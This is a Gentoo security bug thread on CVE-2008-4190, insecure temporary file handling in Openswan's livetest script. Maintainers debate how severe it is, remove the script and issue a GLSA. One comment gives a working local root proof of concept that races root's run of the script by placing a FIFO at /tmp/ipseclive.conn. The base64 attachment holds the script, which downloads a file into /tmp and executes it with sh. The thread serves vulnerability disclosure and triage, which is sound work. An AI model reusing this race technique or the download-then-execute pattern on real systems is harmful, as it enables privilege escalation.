238574 CVE-2008-4190 2008-09-24 15:41 0000 net-misc/openswan livetest Insecure temporary file creation (CVE-2008-4190) 2009-03-09 13:59:44 0000 1 1 1 Unclassified Gentoo Security Vulnerabilities unspecified All Linux RESOLVED FIXED http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4190 B2 [glsa] P2 minor --- 235770 1 rbu@gentoo.org security@gentoo.org mrness@gentoo.org rbu@gentoo.org 2008-09-24 15:41:44 0000 CVE-2008-4190 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4190): The IPSEC livetest tool in Openswan 2.4.4 and earlier allows local users to overwrite arbitrary files and execute arbitrary code via a symlink attack on the (1) ipseclive.conn and (2) ipsec.olts.remote.log temporary files. mrness@gentoo.org 2008-09-24 22:26:01 0000 Version 2.4.4 is quite ancient. Currently the oldest version available in our tree is 2.4.11. rbu@gentoo.org 2008-09-24 22:43:09 0000 I did not verify, but it is well possible that version is also affected. If you can, please help there. mrness@gentoo.org 2008-10-12 16:47:32 0000 I've removed this useless livetest script from versions 2.4.13-r1 and 2.6.18. However, I doubt it is a valid security issue because: a) cannot be triggered remotely b) the host known as 192.168.0.1 by local machine must be controlled by the attacker (or at least its web service) c) you need to trick the root user into running "ipsec livetest" craig@gentoo.org 2008-10-12 20:16:13 0000 It is extremely unlikely that this will ever be exploited in the wild, but it's still a security issue (though a rather theoretical one). mrness@gentoo.org 2008-10-12 21:48:21 0000 Created an attachment (id=168208) livetest script took from version 2.6.16 I'm not saying that the insecure temp file handling is a non-issue, I'm just saying this particular case is a non-issue. Let's analyse this script, shall we? a) Since openswan daemon will not run this in any circumstance, this script must be executed by the user, through "ipsec livetest" command. However, the first thing that the script will do is identity checking through command "id -u"; if you are not root, it will do nothing. b) Let's suppose you can trick user into running that command. wget will not override the output file, instead it will add a numeric suffix to the provided -O argument, in order to save the content into a new file. c) What indeed is possible is that a local user could create a malicious /tmp /ipseclive.conn script and wait patiently for the superuser to run the livetest. But since this command is not documented anywhere (let alone that is pretty useless without the proper web application running on 192.168.0.1), I doubt it will ever do that. craig@gentoo.org 2008-11-07 03:16:11 0000 This is a potentional root exploit: As user: mkfifo /tmp/ipseclive.conn cat /tmp/ipseclive.conn; echo id > /tmp/ipseclive.conn Then, on an other terminal: wget "https://bugs.gentoo.org/attachment.cgi?id=168208" -O livetest Forgive the output, I do not have ipsec installed on this box: [craig@nuw ~]$ sudo sh livetest ikeping...... would do ikeping livetest: line 32: ipsec: command not found livetest: line 35: ipsec: command not found uid=0(root) gid=0(root) Gruppen=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video),35(games),414(vmware) livetest: line 42: ipsec: command not found livetest: line 44: ipsec: command not found cat waits for the input from wget to the fifo and after it received it, you immediately echo your command into the fifo which was empty again and viola, it gets executed, because the sh binary needs a few milliseconds to get loaded, it's a typical race condition. You're right of course, it's very unlikely to be exploited, because you need a local account and must trick root into running the script, but in my opinion it's still a minor security issue. craig@gentoo.org 2008-11-07 22:08:49 0000 CVE-2008-4966 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4966): linux-patch-openswan 2.4.12 allows local users to overwrite arbitrary files via a symlink attack on (a) /tmp/snap##### and (b) /tmp/nightly##### temporary files, related to the (1) maysnap and (2) maytest scripts. craig@gentoo.org 2008-11-07 22:11:56 0000 Let's handle that bug here, too. craig@gentoo.org 2008-12-01 18:03:40 0000 Alin, was this fixed in 2.4.13-r1? mrness@gentoo.org 2008-12-03 23:00:55 0000 (In reply to comment #6) I didn't said it cannot be exploited locally, I said it is highly unlikely (like one case in a billion, when the victim really doesn't know what he is doing) that someone will get bitten by this bug (see comment #5 point c). (In reply to comment #7 to #9) > Alin, was this fixed in 2.4.13-r1? openswan-2.6.13-r1 doesn't install any file called mysnap or mytest. craig@gentoo.org 2009-01-08 23:44:23 0000 Thanks! :) Ready to vote, I vote NO. rbu@gentoo.org 2009-01-08 23:55:21 0000 Shouldn't this be B2 if it allows an attacker to trick someone into executing code? craig@gentoo.org 2009-01-09 00:13:21 0000 D'oh. Of course. I just read the topic, scrolled down fast, saw "symlink", the CVE, B3... forgot about and overread the code exec. Good to see other people are watching... Changing whiteboard accordingly and going to bed in order not create more fuckup on bugzilla (at least) this night... ;( py@gentoo.org 2009-01-11 18:17:35 0000 request filed. rbu@gentoo.org 2009-03-09 13:59:15 0000 GLSA 200903-17 rbu@gentoo.org 2009-03-09 13:59:44 0000 sorry, GLSA 200903-18 168208 2008-10-12 21:48 0000 livetest script took from version 2.6.16 livetest text/plain IyEvYmluL3NoCgojIENvcHlyaWdodCAoQykgMjAwNCAgTWljaGFlbCBSaWNoYXJkc29uCTxtY3JA eGVsZXJhbmNlLmNvbT4KIyAKIyBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNh biByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeSBpdAojIHVuZGVyIHRoZSB0ZXJtcyBvZiB0 aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2UgYXMgcHVibGlzaGVkIGJ5IHRoZQojIEZyZWUg U29mdHdhcmUgRm91bmRhdGlvbjsgZWl0aGVyIHZlcnNpb24gMiBvZiB0aGUgTGljZW5zZSwgb3Ig KGF0IHlvdXIKIyBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLiAgU2VlIDxodHRwOi8vd3d3LmZz Zi5vcmcvY29weWxlZnQvZ3BsLnR4dD4uCiMgCiMgVGhpcyBwcm9ncmFtIGlzIGRpc3RyaWJ1dGVk IGluIHRoZSBob3BlIHRoYXQgaXQgd2lsbCBiZSB1c2VmdWwsIGJ1dAojIFdJVEhPVVQgQU5ZIFdB UlJBTlRZOyB3aXRob3V0IGV2ZW4gdGhlIGltcGxpZWQgd2FycmFudHkgb2YgTUVSQ0hBTlRBQklM SVRZCiMgb3IgRklUTkVTUyBGT1IgQSBQQVJUSUNVTEFSIFBVUlBPU0UuICBTZWUgdGhlIEdOVSBH ZW5lcmFsIFB1YmxpYyBMaWNlbnNlCiMgZm9yIG1vcmUgZGV0YWlscy4KIwojIFJDU0lEICRJZDog bGl2ZXRlc3QuaW4sdiAxLjIgMjAwNS8wNy8xNSAxNjozOToyNSBwYXVsIEV4cCAkCgppZiB0ZXN0 ICIgYGlkIC11YCIgIT0gIiAwIgp0aGVuCiAgICAgZWNobyAicGVybWlzc2lvbiBkZW5pZWQgKG11 c3QgYmUgc3VwZXJ1c2VyKSIgCiAgICAgZXhpdCAxCmZpCgppZiB0ZXN0IGBwaWRvZiBwbHV0b2AK dGhlbgoJZWNobyAiT3BlbnN3YW4gYWxyZWFkeSBzdGFydGVkLCBza2lwcGluZyBpa2VwaW5nIHRl c3RzIgplbHNlCgllY2hvICJpa2VwaW5nLi4uLi4uIgogICAgICAgIGVjaG8gd291bGQgZG8gaWtl cGluZwpmaQoKCnZlcnNpb249ImBpcHNlYyAtLXZlcnNpb258IGhlYWQgLW4gMWAiCiNsZWZ0aWQ9 YGRkIGlmPS9kZXYvdXJhbmRvbSAgY291bnQ9MzIgYnM9MSAyPiAvZGV2L251bGwgfCBtZDVzdW18 IGhlYWQgLWMgMzJgCmxlZnRpZD0nQHBhdWwnCmxlZnRyc2FzaWdrZXk9YGlwc2VjIHNob3dob3N0 a2V5IC0tbGVmdCB8IHRhaWwgLTEgfCBzZWQgInMvXi4qbGVmdC9sZWZ0LyJgCgojZWNobyB3Z2V0 ICBodHRwOi8vMTkyLjE2OC4wLjEvb2x0cy8/bGVmdGlkPSRsZWZ0aWRcJiRsZWZ0cnNhc2lna2V5 JiR2ZXJzaW9uCgp3Z2V0IC1vIC9kZXYvbnVsbCAgLU8gL3RtcC9pcHNlY2xpdmUuY29ubiAiaHR0 cDovLzE5Mi4xNjguMC4xL29sdHMvP2xlZnRpZD0kbGVmdGlkJiRsZWZ0cnNhc2lna2V5JnZlcnNp b249JHZlcnNpb24iCgpzaCA8IC90bXAvaXBzZWNsaXZlLmNvbm4KaXBzZWMgZXJvdXRlLnBsCmxl ZnRpZD1gZWNobyAkbGVmdGlkIHwgc2VkICJzL0AvLyJgCmlwc2VjIHdoYWNrIC0tbmFtZSBvbHRz LSRsZWZ0aWQgLS1kZWxldGUgPj4gL3RtcC9pcHNlYy5vbHRzLmxvY2FsLmxvZwp3Z2V0IC1vIC9k ZXYvbnVsbCAtTyAvdG1wL2lwc2VjLm9sdHMucmVtb3RlLmxvZyAiaHR0cDovLzE5Mi4xNjguMC4x L29sdHMvbG9nLnBocD9sZWZ0aWQ9JGxlZnRpZCIKCiMKIyAkTG9nOiBsaXZldGVzdC5pbix2ICQK IyBSZXZpc2lvbiAxLjIgIDIwMDUvMDcvMTUgMTY6Mzk6MjUgIHBhdWwKIyBjaGFuZ2VkICdoZWFk IC14JyB0byAnaGVhZCAtbiB4JyBzaW5jZSB0aGlzIGlzIGFwcGFyZW50bHkgZnVuY3Rpb25hbGl0 eQojIHRoYXQgd2lsbCBiZSByZW1vdmVkIGZyb20gdGhlIGhlYWQgY29tbWFuZCBzb29uLgojCiMg UmV2aXNpb24gMS4xICAyMDA0LzA3LzEzIDIyOjMxOjM4ICBtY3IKIyAgICBsaXZlIHRlc3QgdGVt cGxhdGUKIwojCiMK